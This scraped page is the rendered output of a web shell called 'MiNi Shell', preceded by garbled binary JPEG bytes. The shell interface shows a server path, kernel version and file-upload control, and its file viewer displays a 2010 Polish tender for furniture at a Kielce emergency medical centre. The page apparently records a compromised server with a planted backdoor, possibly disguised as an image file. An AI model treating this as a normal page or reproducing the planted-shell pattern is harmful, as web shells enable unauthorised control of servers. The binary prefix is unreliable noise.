JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100809/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100809/242510-N-2010.html

<p class="kh_header"><b>Kielce: Dostawa i montaż mebli do oddziałów ŚCRMiTS</b><br>
<b>Numer ogłoszenia: 242510 - 2010; data zamieszczenia: 09.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Świętokrzyskie Centrum Ratownictwa Medycznego i Transportu Sanitarnego , ul. Św. Leonarda 10, 25-311 Kielce, woj. świętokrzyskie, tel. 041 3612344 w. 29.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.scrmits.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż mebli do oddziałów ŚCRMiTS.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa i montaż mebli nietypowych, wykonanych pod wymiar poszczególnych 
    pomieszczeń, oraz mebli tapicerowanych i metalowych do pomieszczeń wg poniższego 
     wykazu i opisu:

Lp.	OPIS	WYMIARY	J.M.	ILOŚĆ
		SZ	GŁ	WYS		
1	2	 	 	 	3	4
1	GABINETY LEKARSKIE  1 i 2	 	 	 	 	 
2	Szafa ubraniowa z przegrodą 	800	600	2000	szt	2
3	Biurko na metalowej podstawie	1200	600	750	szt	2
4	Przystawka biurka 3,4 koła	750	750	750	szt	2
5	Kontener biurowy 3 szufladowy	400	500	550	szt	2
6	Krzesło obrotowe zmywalne profil RE	630	630	1135	szt	2
7	Wieszak stojący TOP chrome	 	 	 	szt	2
8	Leżanka lekarska zmywalna	1850	550	500	szt	2
9	Parawan 	1900	 	1900	szt	2
10	Stół z szafką do badania niemowląt	800	600	750	szt	1
11	GABINET ZABIEGOWY	 	 	 	 	 
12	Obudowa zlewozmywaka	 	 	 	szt	1
13	Obudowa umywalki	 	 	 	szt	1
14	Szafka stojąca narożna	 	 	 	szt	1
15	Szafka stojąca  z drzwiczkami	 	 	 	szt	2
16	Blat , CORIAN,STARON,	7000	600	28	Kpl	1
17	Szafka z szufladami i blatem ,komoda,	800	600	840	szt	1
18	Szafka wisząca narożna	 	 	700	szt	1
19	Szafka wisząca oszklona	 	 	700	szt	6
20	Biurko na metalowej podstawie	1200	600	750	szt	1
21	Przystawka biurka 3,4 koła	750	750	750	szt	1
22	Kontener biurowy 3-szufladowy	400	500	550	szt	1
23	Krzesło obrotowe zmywalne profil RE	630	630	1135	szt	1
24	Krzesło zmywalne np.ISO chrome	545	425	820	szt	3
25	Leżanka lekarska  zmywalna	1850	550	500	szt	1
26	Parawan 	1900	 	1900	szt	1
27	Stolik medyczny 4 półkowy	520	450	900	 	1
28	Szafa na leki oszklona 	800-1000	450	2000	szt	1
29	POCZEKALNIA	 	 	 	 	 
30	Krzesło zmywalne np.CORTINA chrome	450	450	800	szt	10
31	Stolik kwadratowy na met podstawie chrome	750	750	750	szt	2
32	Wieszak stojący TOP chrome	 	 	 	szt	2
33	POMIESZCZENIE GOSPODARCZE	 	 	 	 	 
34	Regał metalowy 5 półkowy	900	600	2000	szt	2
35	Wieszak stojący TOP chrome	 	 	 	szt	1
36	MAGAZYN  LEKÓW	 	 	 	 	 
37	Szafka stojąca z szufladami 	800do900	750	700	szt	3
38	Szafa z drzwiami przesuwnymi	2600-2700	750	1800	kpl	1
39	ŚWIETLICA ,STOŁÓWKA	 	 	 	 	 
40	Szafka stojąca dwudrzwiowa, drzwiczki przesuwn.	1500-1700	600	840	kpl	1
41	Obudowa zlewozmywaka 	 	600	840	szt	1
42	Obudowa umywalki	 	600	840	szt	1
43	Szafka stojąca	 	600	840	szt	3
44	Szafka wisząca	600	350	700	szt	2
45	Stół  prostokątny na metalowej podst. Chrome	1400	700	750	szt	6
46	Krzesło zmywalne np.ARIOSO alu	495	490	825	szt	24
47	Stolik pod telewizor ,komoda,	800	500	1130	szt	1
48	Wieszak stojący TOP chrome	 	 	 	szt	1
49	POKOJE ZESPOŁÓW WYJAZDOWYCH	 	 	 	 	 
50	Tapczan 1 osobowy	2000	800	450	szt	16
51	Szafka nocna ,szuflada, drzwiczki,	400	500	650	szt	16
52	Stolik kw. na met podstawie chrome	700	700	750	szt	5
53	Krzesło zmywalne np.ISO chrome	545	425	820	szt	16
54	Półka wisząca na dokumenty	800	330	300	szt	5
55	MAGAZYNY ,pościel,sprzęt,	 	 	 	 	 
56	Szafa magazynowa z nadstawką	 	500	2600	szt	7
57	Regał metalowy 5 półkowy	900	600	2000	szt	7
58	SALA KONFERENCYJNA	 	 	 	 	 
59	Stół konferencyjny 12 częsciowy	1920	700	750	kpl	1
60	Krzesło np.ARIOSO alu	495	490	825	szt	60
61	Szafka stojącz z blatem	650	500	840	szt	2
62	Komoda 3-drzwiowa oszklona	1250	500	1400	szt	1
63	Wieszak stojący TOP chrome	 	 	 	szt	3
64	SZATNIE	 	 	 	 	 
65	Szafa metalowa Bhp np. SUM 420	800	490	1900	szt	31
66	Krzesło zmywalne np.CORTINA	450	450	800	szt	8
67	POMIESZCZENIE KIEROWNIKA MED.	 	 	 	 	 
68	Szafa ubraniowa z przegrodą 	800	600	1950	szt	1
69	Szafa aktowa	800	400	1950	szt	1
70	Regał biblioteczny oszklony	800	400	1950	szt	1
71	Komoda dwudrzwiowa	600	400	1130	szt	1
72	Biurko 2 szafkowe	1300	600	750	szt	1
73	Przystawka biurka 3,4 koła	750	750	750	szt	1
74	Krzesło obrotowe zmywalne profil RE	630	630	1135	szt	1
75	Krzesło np. ISO chrome	545	425	820	szt	2
76	POKÓJ PIELĘGNIARKI ODDZIALOWEJ	 	 	 	 	 
77	Szafa ubraniowa z przegrodą 	800	600	1950	szt	1
78	Szafa aktowa	800	400	1950	szt	2
79	Komoda z drzwiczkami	600	400	1130	szt	1
80	Biurko 2 szafkowe	1300	600	750	szt	1
81	Przystawka biurka 3,4 koła	750	750	750	szt	1
82	Stolik okol. blat szklany np. ST 25	650	650	580	szt	1
83	Krzesło obrotowe zmywalne profil RE	630	630	1135	szt	1
84	Krzesło np. ISO chrome	545	425	820	szt	4
85	POKÓJ BIUROWY	 	 	 	 	 
86	Szafa ubraniowa z przegrodą 	800	600	1950	szt	1
87	Szafa aktowa	800	400	1950	szt	2
88	Biurko 2-szafkowe	1300	600	750	szt	1
89	Komoda	600	400	1130	szt	1
90	Przystawka biurka 3,4 koła	750	750	750	szt	1
91	Krzesło obrotowe profil RE	630	630	1135	szt	1
92	POKÓJ BIUROWY,KONTROLI,	 	 	 	 	 
93	Szafa ubraniowa z przegrodą 	800	600	1950	szt	1
94	Krzesło obrotowe  profil RE	630	630	1135	szt	1
95	POKÓJ KIEROWNIKA	 	 	 	 	 
96	Biurko gabinetowe 	1600	700	750	szt	1
97	Kontener biurowy 3 szufladowy	400	500	550	szt	1
98	Konrener pod komputer	300	500	550	szt	1
99	Przystawka biurka 1,2 koła	1000	500	750	szt	1
100	Fotel obrotowy biurowy np SWING	710	710	1170	szt	1
101	Szafa ubraniowa z przegrodą 	800	600	1950	szt	1
102	Szafa aktowa	800	400	1950	szt	1
103	Szafa biblioteczna oszklona	800	400	1950	szt	2
104	Komoda 3 drzwiowa oszklona	 	400	1300	szt	1
105	Stolik okol. blat szklany np. ST 24	1250	650	580	szt	1
106	Fotel klubowy	 	 	 	szt	2
107	DYSPOZYTORNIA	 	 	 	 	 
108	Stół dyspozytora ,zabudowa stała , wraz z kontenerami i półkami	3260	750	760	kpl	1
109	Szafka stojąca  z szufladami	450	500	760	szt	2
110	Szafka stojąca z drzwiczkami	600	500	760	szt	2
111	Fotel obrotowy biurowy skóra	750	750	1230	szt	1
112	Komoda z drzwiczkami	800	400	1130	szt	1
113	Stolik kw. na met podstawie chrome	700	700	750	szt	1
114	Krzesło np.ISO	545	425	820	st	2
115	Fotel rozkładany	1300	1000	1000	szt	1
116	Półka pod drukarkę	600	500	600	szt	2
117	POKÓJ  Z-CY KIER. ODDZIAŁU  DS. MED. STARACHOWICE	 	 	 	 	 
118	Komoda z drzwiczkami	750	450	850	szt	2
119	Szafa aktowa	750	450	1950	szt	1
120	Szafa ubraniowa 	550	450	1950	szt	1
121	Biurko 2 szafkowe	1300	600	750	szt	1
122	Półka wisząca 	650	350	300	szt	1
123	Stolik okol. Blat szklany  np.ST 24	1250	650	580	szt	1
124	ODDZIAŁ SKARŻYSKO	 	 	 	 	 
125	KORYTARZE	 	 	 	 	 
126	Deska odbojowa	350	 		mb	108,9 
127	KLATKA SCHODOWA	 	 	 	 	 
128	Deska odbojowa	450	 		mb	15,4 
129	POMIESZCZENIA	 	 	 	 	 
130	Deska odbojowa	600	 		mb	38 



                                       WYMOGI TECHNICZNE MEBLI

                              GABINETY LEKARSKIE oraz GABINET ZABIEGOWY

Szafy, biurka, kontenery, przystawki biurek ,szafa na leki oraz stół do badania niemowląt należy wykonać z płyty MDF 2 stronnie laminowanej.
Blaty i elementy  wieńczące płyta MDF gr. 28 mm. Ściany boczne, drzwi i półki
płyta MDF gr. 19mm Wszystkie wąskie płaszczyzny,krawędzie, zabezpieczone obrzeżem 
PCV gr 2 mm Ścianki tylne płyta lakierowana HDF w kolorze drzwi. Stelaż biurek metalowy malowany proszkowo typC-1 BK 
 	Szafki stojące i wiszące należy wykonać z płyty MDF 2-stronnie laminowanej o gr. 19mm
Wąskie płaszczyzny zabezpieczone jw. 
Drzwi montowane na zawiasach puszkowych. Szuflady na prowadnicach typu np.:METABOX Wszystkie drzwi i szuflady zamykane zamkiem patentowym. Uchwyt metalowy chrom
	Szafki stojące wraz z blatem  w gabinecie zabiegowym tworzą zabudowę stałą 
w kształcie litery L Blat wykonany z materiału antyseptycznego o gr 35 mm, np.CORIAN STARON,
	Pozostałe meble typowe

                                             MAGAZYN LEKÓW

Szafki stojące z szufladami wraz z szafą z drzwiami przesuwnymi tworzą jedną trzy komorową zabudowę stała.
Całość należy wykonać z płyty MDF 2 stronnie laminowanej o gr 19 mm.
Drzwi przesuwne w ramach z aluminium Szuflady na prowadnicach kulkowych z pełnym wysuwem .Rozstaw półek co 500mm.

                                                  MEBLE MAGAZYNOWE 

 	Szafy magazynowe należy wykonać z płyty wiórowej laminowanej o gr 18mm wąskie płaszczyzny oklejone PCV gr. 2 mm , drzwi zamykane zamkiem patentowym Rozstaw półek co 500mm
	Regał metalowy 5 półkowy Szkielet wykonany z blachy stalowej o gr 2 mm skręcany, półki wykonane z blachy stalowej o gr 0,8 mm .Całość malowana proszkowo .Wymagane obciążenie półki minimum 100kg

                                                   MEBLE BIUROWE

Biurka .kontenery, przystawki, szafy ubraniowe, szafy aktowe, szafy biblioteczne, komody,
Blaty oraz elementy wieńczące wykonane z płyty wiórowej laminowanej o gr. 28 mm pozostałe elementy z płyty laminowanej o gr. 18 mm. Wąskie płaszczyzn okleinowane PCV o gr 2 mm Ścianki tylne płyta HDF lakierowana w kolorze drzwi. Drzwi montowane na zawiasach puszkowych Szuflady na prowadnicach typu np. METABOX Wszystkie drzwi i szuflady zamykane zamkiem patentowym.


SZAFY METALOWE Bhp

	Dwudrzwiowa szafa ubraniowa o wym. 1800na800na490 Każda komora szafy  podzielona na dwa przedziały , ubrania dzienne-robocze,
	Wieńce wykonane z blachy stalowej ocynkowanej o gr. 1 mm pozostałe elementy wykonane z blachy stalowej o gr. 08 mm
	 Drzwi zamykane zamkiem patentowym z blokadą w trzech punktach Całość malowana farbami proszkowymi

STOŁY KWADRATOWE

Stelaż stolika metalowy chromowany, blat płyta wiórowa laminowana gr. 28mm okleinowany PCV gr. 2 mm.

STOŁY PROSTOKĄTNE ,świetlica , sala konferencyjna,

Stelaż metalowyKS 60 malowany proszkowo, blat płyta wiórowa laminowana gr. 28 mm okleinowana PCV gr.2mm

ŚWIETLICA- STOŁÓWKA 

Obudowa liczników wraz obudowami zlewu .umywalki i szafkami stojącymi stanowią zabudowę stała z zamontowanym blatem typu np.PODSFORMING
Meble wykonać w systemie mebli biurowych

POKOJE ZESPOŁÓW WYJAZDOWYCH

Tapczany, skrzynia i szczyty tapczanu wykonana z płyty wiórowej laminowanej gr. 18mm boki ,elementy do mocowania automatów , sklejka liściasta gr. 22mm
Poducha, rama poduchy wzmocniona na całości sklejką o gr 9 mm do ramy przymocowana formatka sprężynowa np.BONEL nakryta filcem gr3 mm następnie formatką z maty kokosowej gr 10-12 mm , pianką i tkaniną obiciową
Szafki nocne wykonane w systemie mebli biurowych z szufladą i drzwiczkami zamykanymi zamkiem patentowym


DYSPOZYTORNIA

 	Stół pulpit dyspozytora , skład : półki pod klawiaturę, kontenery pod stację dysków, obudowy radiostacji, prostowników, zasilaczy z zamontowanym kanałem kablowym, wykonany w systemie meblowym
	Stół wraz z szafkami stojącymi stanowią zabudowę stałą w kształcie rozwartej litery L
Pozostałe meble typowe

ODBOJNICE
Deski odbojowe należy wykonać z płyty wiórowej laminowanej oklejonej PCV gr 2 mm

UWAGA: 100% mebli skrzyniowych to meble nietypowe które należy wykonać pod wymiar poszczególnych pomieszczeń ,wymiary podane w załączniku nr 1 są wymiarami przybliżonymi

 Należy zapoznać się przed dokonaniem wyceny z miejscem dostawy, montażu mebli i odbojnic i ustalić z kierownikiem oddziału , nazwiska i numery telefonów do kontaktu w paragrafie 5 projektu umowy- zał. nr 6 do SIWZ, warunki dotyczące kształtu, kolorystyki i wymogów technicznych poszczególnych mebli.
 
Meble mają być wykonane zgodnie z obowiązującymi normami . 

Na meble pochodzące z produkcji seryjnej należy przedłożyć wymagane przepisami atesty i certyfikaty.
Na materiały z których zostaną wykonane meble nietypowe należy przedłożyć wymagane atesty.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest wykazanie przez Wykonawcę realizacji co najmniej 2 dostaw w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.
uszczegółowienie - opis wymaganego doświadczenia dla wykonawców:
wykaz co najmniej dwóch dostaw na kwotę minimum 100 tys. zł każda zrealizowanych do placówek służby zdrowia o podobnym zakresie i charakterze do przedmiotu niniejszego zamówienia, wraz z potwierdzeniem że te dostawy zostały wykonane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Na meble pochodzące z produkcji seryjnej należy przedłożyć wymagane przepisami atesty i certyfikaty.Na materiały z których zostaną wykonane meble nietypowe należy przedłożyć wymagane atesty</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.scrmits.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 25-040 Kielce ul. Pakosz 72 , pokój 301.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.08.2010 godzina 12:00, miejsce: 25-040 Kielce ul. Pakosz 72 , pokój 301 lub 202.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 16.09.2010.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com